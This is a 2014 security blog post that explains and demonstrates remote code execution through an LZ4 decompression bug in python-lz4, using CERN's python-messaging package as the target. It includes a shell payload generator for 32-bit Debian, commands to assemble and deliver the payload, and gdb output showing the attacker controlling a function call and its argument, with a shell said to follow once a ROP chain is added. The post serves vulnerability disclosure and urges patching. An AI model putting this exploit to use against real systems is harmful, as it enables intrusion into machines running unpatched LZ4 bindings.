Monday, July 7, 2014

Hacking CERN - Exploiting python-lz4 for Particles and Profit


Editor's Note: The TL;DR of this long technical report can be summarized as
  • LZ4 was always critically vulnerable whether in Kernel or User-land
  • Exploitation is easy regardless of the attack used (16MB or 2+MB)
  • PoCs are written for python2.7 on 32bit ARM/x86 (scroll to the end)
  • Updating is critical for all consumers of LZ4, not just python-lz4
Additional Note: The author of LZ4 claims that the PoC presented in the blog below was written against some ghostly alternative version of LZ4. For further proof of exploitation, the sample payload generated by the script at the end of this blog post will also crash python-lz4 (versions prior to r119) directly. The CERN software was simply used as a fun real-world example because their package depends on python-lz4. To test, call the Python bindings directly with:
donb@debian:~/lz4$ ./
donb@debian:~/lz4$ printf "\x00\x10\x00\x00" > header.lz4
donb@debian:~/lz4$ cat header.lz4 test.lz4 > exploit.lz4
donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ python
Python 2.7.3 (default, Mar 14 2014, 11:57:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import lz4
>>> f = open("./exploit.lz4")
>>> lz4.uncompress(
Segmentation fault (core dumped)

A Race Lost Before It Began

Obviously the LZ4 issue has gotten a lot of attention, but unfortunately for the wrong reasons. A side effect of the negative reaction from the author of LZ4 is that some packages dependent on the compression algorithm thought that there was little reason to update. This led to some packages (like java-lz4) to update quickly, while others (like python-lz4) were left behind. 

Speaking with the python-lz4 maintainer, Steeve Morin (@steeve), revealed that he is actually a pretty good guy. Once he learned that there are real and tangible security issues with LZ4, he immediately got to work on a patch. The checkin for the r119 update is now available for here. I want to emphasize that once Steeve understood the security impact, he got to work straight away. This is a great example of vendor response, even if the vendor's perception was previously tainted by misinformation. 

Block Size What?

It's understandable that a lot of packages will want to adhere to the LZ4 "standards" and maintain a semblance of block sizes. This is a lot less interesting for higher level languages (HLL) such as Python, Erlang, or even Java, where APIs simply ingest data and pass it along to and from lower layer libraries. The libraries are expected to adhere to the brunt of the standard. This makes HLL code, in many cases (read: most), simply data proxies. 

There are many, many examples of this trend online. A quick search on github/etc will show countless packages that use algorithms such as python-lz4 in ways that violate an implied or documented "standard". Since I have no interest in developing a proof of concept for every python package out there, I picked one that looked like fun. 

(Re?)Introducing CERN's Messaging Library

In 2013, CERN MIG released some elegant Python messaging APIs built around abstractions that use AMQP, such as RabbitMQ and similar projects. These projects are used to build and implement a distributed Enterprise Messaging System that can traffic data at high speeds across network nodes. The elasticity of this system makes it extremely easy to manage expansion across servers and data-centers. 

EDITOR'S NOTEThe author of LZ4 is spreading more incorrect information on his blog, claiming that CERN uses a custom version of LZ4. This is False. CERN's python-messaging package uses python-lz4 by default, the very package the LZ4 author claims cannot be attacked. 

One cool subproject is python-messaging. This package can be used to build or inspect messages that may then be sent to a messaging queue, such as DirQ. One cool aspect of this package is that it can automatically handle the compression and base64 encoding of data. This means that python-message can be used to send a single message to potentially thousands of target systems through a single queue. Since python-messaging incorporates LZ4 by default, all of these endpoints are potentially exploitable. 

A message in python-messaging can be constructed using simple dictionaries. To get the module to parse a JSON message that has been translated into a Python dict, we have to adhere to the requirements in the dejsonify function. Let's check out line 296 of below. 

def dejsonify(obj):
    """ Returns a message from json structure. """
    is_text = False
        if obj.get('text'):
            is_text = True
    except AttributeError:
        raise MessageError("dict expected: %s" % obj)
    header = obj.get('header', dict())
    body = obj.get('body', DEFAULT_BODY)
    encoding = list()
    o_encoding = obj.get('encoding')
    if o_encoding:
        encoding = o_encoding.split('+')
        if not is_bytes(body):
            body = body.encode()
    for token in encoding:
        if token not in AVAILABLE_DECODING:
            raise MessageError("decoding not supported: %s" % token)
        elif (token in COMPRESSORS_SUPPORTED and token not in COMPRESSORS):
            raise MessageError("decoding supported but not installed: %s" %
    if 'base64' in encoding:
        body = base64.b64decode(body)
    for method in _COMPRESSORS:
        if method in encoding:
            body = _COMPRESSORS[method].uncompress(body)
    if 'utf8' in encoding:
        body = body.decode('utf-8')
    if is_bytes(body):
        if is_text:
            body = body.decode()
    elif not is_text:
        body = body.encode()

    return Message(body, header)

In the code above, there are a few things we have to do to get to the "uncompress()" function at the bottom. They're simple:
  • Add an empty header (dict)
  • Add a body with binary data
  • Define an encoding that specifies one or more encodings, optionally separated by '+'
This equates to the following Python2 code:

from messaging import message as M
f = open("./exploit.lz4")
d =
j = {'header': {}, 'body': d, 'encoding': 'lz4+utf8'}

So now we can see that the LZ4 uncompress function can be called very easily with CERN's python-messaging API. Implementing a full blown RabbitMQ system would be fun here, but that is overkill. It is enough to attack LZ4 through the CERN software as a demonstration of RCE. If you are able to send this simple message into a queue like DirQ, then you have already won.

But, my goal wasn't to simply attack CERN's software. That would be fun, but kind of useless. Why attack one package when you can instead attack any package using python-lz4? That sounds like a lot more fun. 

A Snake Bites Its Tail

It is quite easy to gain remote code execution in Python2 via memory corruption, especially if you can write to memory just before the start of an Object's buffer space. This is precisely what happens with the LZ4 bug. Since there are no memory or buffer size constraints in the CERN python-messaging package, we'll use the 16MB attack to easily point to memory prior to the start of the decompression buffer. 

Let's take a look at the Python bindings in python-lz4. You can follow along here

    dest_size = load_le32(source);
    if (dest_size > INT_MAX) {
        PyErr_Format(PyExc_ValueError, "invalid size in header: 0x%x", dest_size);
        return NULL;
    result = PyBytes_FromStringAndSize(NULL, dest_size);
    if (result != NULL && dest_size > 0) {
        char *dest = PyBytes_AS_STRING(result);
        int osize = LZ4_decompress_safe(source + hdr_size, dest, source_size - hdr_size, dest_size);

As can be seen above, a four byte little-endian header must be placed at the start of the LZ4 payload. This value represents the size of the decompressed data. We can use almost any value here, but I choose (1024 * 1024) for simplicity. 

Line 115 calls the function PyBytes_FromStringAndSize, creating a PyObject that represents a PyString_Type object. The entire PyObject, with its header values and other objects, is allocated. A buffer size of 'dest_size' is allocated within this PyObject. This is where Python will evaluate the decompressed LZ4 payload when the Python bindings return. 

Line 117 contains an important call to PyBytes_AS_STRING. This function returns a C style pointer to the memory buffer Python has allocated as scratch space. In other words, the address returned is an address that points to memory that can be written to by the LZ4 code. This should be a safe place to store data. 

To understand how this works, let's take a look at the Python source code. Because systems like Debian are using a back-patched version of 2.7, we'll focus on the 2.7 branch on github so readers can easily follow long. 

PyBytes_AS_STRING is defined as the macro PyString_AS_STRING. This macro is defined in Include/stringobject.h and simply returns the address of 'ob_sval'. So what is ob_sval? That depends on the structure PyStringObject. Let's take a look.

typedef struct {
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];

    /* Invariants:
     *     ob_sval contains space for 'ob_size+1' elements.
     *     ob_sval[ob_size] == 0.
     *     ob_shash is the hash of the string or -1 if not computed yet.
     *     ob_sstate != 0 iff the string object is in stringobject.c's
     *       'interned' dictionary; in this case the two references
     *       from 'interned' to this object are *not counted* in ob_refcnt.
} PyStringObject;

On line 35, shown above, we can see the definition of a PyStringObject. The structure member 'ob_sval' has a form that is typical of "unfinished structures" in the C language. Essentially, an object with a size of [1] at the end of a structure implies that the structure will be extended at this point. In other words, the address of ob_sval (&ob_sval[0]) is the start to the writable memory buffer to be used in C code. 

To make this more clear, here is an example memory allocation. If you wanted to store the string "Hello" in a PyStringObject, you would use the following code:

int size = strlen("Hello") + 1;
char * ptr;
PyStringObject * string;
string = malloc(sizeof(*string) + size);
ptr = &string->ob_sval[0];
memcpy(ptr, "Hello", size);

This way, the Object maintains its requisite form that includes standard Python PyObject header values, while being capable of storing type specific data. This is a weak form of type inheritance often used in C. 

So let's look back at the python-lz4 code to see why this information is important. 

        char *dest = PyBytes_AS_STRING(result);
        int osize = LZ4_decompress_safe(source + hdr_size, dest, source_size - hdr_size, dest_size);

Now, in looking at the above code, we realize that the address 'dest' points to an address within the actual PyStringObject structure. This means that if we can point to slightly before the address stored in 'dest', we can overwrite critical values in the PyStringObject header. 

Most importantly, we can overwrite the core header values within PyStringObject. These values are defined with the macro PyObject_VAR_HEAD, as seen in the code snippet above. Tracing the multiple layers of definitions for PyObject_VAR_HEAD leads us to the core values in a PyObject structure, defined with the macro PyObject_HEAD found on line 77 of this file

/* PyObject_HEAD defines the initial segment of every PyObject. */
#define PyObject_HEAD                   \
    _PyObject_HEAD_EXTRA                \
    Py_ssize_t ob_refcnt;               \
    struct _typeobject *ob_type;

The macro _PyObject_HEAD_EXTRA is only defined if tracing is enabled, which it shouldn't be on your distribution unless you have a custom variant. So, the first variable to be set in a PyObject (or PyStringObject) structure is 'ob_refcnt', followed by 'ob_type'. 

Type Confusion In C

The variable we'll focus on here is 'ob_type'. Why? This is the variable that defines what type of structure is held within a PyObject. This is where the weird (unholy?) dynamic type system of C comes in. This variable basically indicates how the C code should interpret the rest of the structure after the 'ob_type' variable. In the case of a string, the variable 'ob_type' will point to PyString_Type. 

Now, PyString_Type is of the type PyTypeObject, another base structure similar to PyObject, except more detailed. It's important to note that like PyObject, it shares the same base header values defined by PyObject_VAR_HEAD. Even more important is the fact that PyTypeObject is a structure that contains multiple function pointers, such as tp_dealloc, the function that will be called when an Object is no longer used. Check out the structure on line 324 of this file

typedef struct _typeobject {
    const char *tp_name; /* For printing, in format "." */
    Py_ssize_t tp_basicsize, tp_itemsize; /* For allocation */

    /* Methods to implement standard operations */

    destructor tp_dealloc;

As depicted above, if we can corrupt memory and overwrite the PyStringObject's ob_type variable, we can point it to a different object than to PyString_Type. This means that, potentially, we can call a function of our choice. 

But, this doesn't give us straight up code execution, does it? No, it doesn't. This is because we have no idea where in memory our payload resides due to ASLR and other subtleties of the heap allocation system. As a result, we can't simply point back into our own buffer. We have to get a bit creative. 

Keep in mind that even though we can overwrite an address to an Object that contains a pointer, that doesn't get us much. Because of ASLR and the requirement of using a specific address offset from the base of an Object in memory, we don't have many valid choices. This means that we are going to have to dig into the Python base executable to identify a secondary function to attack. 

We know that when the garbage collector tries to deallocate our Object, the Object's base address will be passed to the tp_dealloc destructor function. What we need to do is figure out where in the Python code base is an object with a function that will use our payload as a place to retrieve other function pointers. 

Since we know we can overwrite the PyStringObject.ob_type variable using the LZ4 bug, let's find a function in Python that will do our bidding. Remember, python is not PIE on most systems. You can check this by executing the following: 

donb@mouse:~$ readelf -h /usr/bin/python2.7
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)

If the above Type is "EXEC" and not "DYN", you're golden. This should be true even of recent Ubuntu systems, Debian, Mint, etc. 

Knowing that the base executable is not PIE, we can specify a different PyTypeObject that will get us more of the flexibility we want. After scouring through various Python types, an obvious contender appears. Check out line 2468 of Objects/fileobject.c

PyTypeObject PyFile_Type = {
    PyVarObject_HEAD_INIT(&PyType_Type, 0)
    (destructor)file_dealloc,                   /* tp_dealloc */

The structure above is defined with a custom destructor function 'file_dealloc'. Upon inspection, the function 'file_dealloc' is passed a PyObject that is interpreted as a PyFileObject*. So, our PyStringObject* pointer, when passed to file_dealloc, would be interpreted as a File Object, not a String Object. 

This function almost immediately calls close_the_file, another custom function specific to the File Object code. This function takes an address straight from our payload and interprets it as a function address. It calls it later as "local_close". Check out the function on line 420 of the same file. 

static PyObject *
close_the_file(PyFileObject *f)
    int sts = 0;
    int (*local_close)(FILE *);
    FILE *local_fp = f->f_fp;
    char *local_setbuf = f->f_setbuf;
    if (local_fp != NULL) {
        local_close = f->f_close;
        if (local_close != NULL && f->unlocked_count > 0) {
            if (f->ob_refcnt > 0) {
                    "close() called during concurrent "
                    "operation on the same file object.");
            } else {
                /* This should not happen unless someone is
                 * carelessly playing with the PyFileObject
                 * struct fields and/or its associated FILE
                 * pointer. */
                    "PyFileObject locking error in "
                    "destructor (refcnt <= 0 at close).");
            return NULL;
        /* NULL out the FILE pointer before releasing the GIL, because
         * it will not be valid anymore after the close() function is
         * called. */
        f->f_fp = NULL;
        if (local_close != NULL) {
            /* Issue #9295: must temporarily reset f_setbuf so that another
               thread doesn't free it when running file_close() concurrently.
               Otherwise this close() will crash when flushing the buffer. */
            f->f_setbuf = NULL;
            errno = 0;
            sts = (*local_close)(local_fp);

As we can see above, there are few requirements for executing local_close(). In addition, local_close is passed a variable 'local_fp', which is a value also obtained from our payload. 

If we can ensure that 'unlocked_count' is equal to zero, and 'weakreflist' is equal to NULL, we will end up with a call to any address we choose, while passed a variable of any value we choose. This is a much better way to kick off a ROP payload, as we now have the ability to call any address we want. 

The Payload

Now that we know we can get arbitrary code execution, all that is left is to figure out how to generate an LZ4 payload that mimics a PyFileObject. 

# - payload generator
# A Python2.7 exploit for 32bit Debian 7.5.0
# by Don A. Bailey
# For technical evaluation only. Do not misuse.


        printf $1 >> $FILE

        rm -f $FILE
        touch $FILE

        x="\"\\xff\" x $1" 
        perl -e "print $x" >> $FILE

        while [ $i -lt $1 ]; do
                append $2

# initialize the file

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well 
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# create the offset and point to PyObject.ob_type
large 16842995
append "\xdd"

# PyFile_Type technique
# we need 72 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"      # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"      # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# now finish with a bad reference
append "\xff\xff"

In the script above, I have written a payload generator for 32bit Debian 7.5.0. By overwriting ob_type with file_dealloc(), we force the function to interpret our PyStringObject as a PyFileObject. This causes close_the_file() to interpret 'f_close' as function address 0x88776655. It will be passed the value 0x44332211, also in our payload. 

The Proof

To test this payload, we simply generate the LZ4 payload, place a small header at the front of the payload, and execute the attack using CERN's code as a test bed. 

donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ cat header.lz4 test.lz4 > x.lz4 
donb@debian:~/lz4$ PYTHONPATH=~/lib/src/cern/python-messaging /usr/bin/python ./
Lazy4 python2.7 RCE -
+ opening lz4 payload
+ building header
+ attacking CERN
Segmentation fault (core dumped)
donb@debian:~/lz4$ gdb -q /usr/bin/python2.7 core
Reading symbols from /usr/bin/python2.7...(no debugging symbols found)...done.
[New LWP 5776]

warning: Can't read pathname for load map: Input/output error.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/".
Core was generated by `/usr/bin/python ./'.
Program terminated with signal 11, Segmentation fault.
#0  0x88776655 in ?? ()
(gdb) x/8x $esp
0xbfffee4c:     0x08196350      0x44332211      0xb798e12a      0xbfffeebc
0xbfffee5c:     0xb7d27c60      0xb798e126      0x0830f47c      0x082f1050
(gdb) i r ebp
ebp            0x44332211       0x44332211
(gdb) i r esi
esi            0x88776655       -2005440939

In the above example, we've successfully exploited Python2.7 and triggered a call to the function at the (invalid) address 0x88776655. We've also successfully passed the argument 0x44332211 as the first parameter to our function. Note that ebp and esi are set to our values, making ROP a bit easier to deal with. 

After incorporating a sufficient ROP payload, we can execute a shell. ROP payload development is left as an exercise for the reader. 

donb@debian:~/lz4$ ulimit -c unlimited
donb@debian:~/lz4$ ./ 
donb@debian:~/lz4$ cat header.lz4 test.lz4 > x.lz4 
donb@debian:~/lz4$ PYTHONPATH=~/lib/src/cern/python-messaging /usr/bin/python ./
Lazy4 python2.7 RCE -
+ opening lz4 payload
+ building header
+ attacking CERN


I think this conclusively proves the value of an exploit against LZ4. This is not a CERN specific attack, but an attack against Python, using python-lz4. While the exploit (for now) will need to be tailored to each specific target platform, each platform is vulnerable in the same way. This makes an elegant memory corruption like LZ4 universally at risk. 

I have tested and succeeded in developing payloads for both ARM (32bit) and x86 (32bit) on Ubuntu and Debian. 

For more information on this vulnerability, and for help fixing or identifying if your implementation is at risk of exploitation, please visit our website. The Lab Mouse team is dedicated to providing you with top tier information security services. We're happy to help you through a white box, black box, or red team assessment, or simply to streamline security within your project or organization. 

Feel free to reach out to us for more information. We're always eager to help, even if it just means having a short discussion! 

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security

No comments:

Post a Comment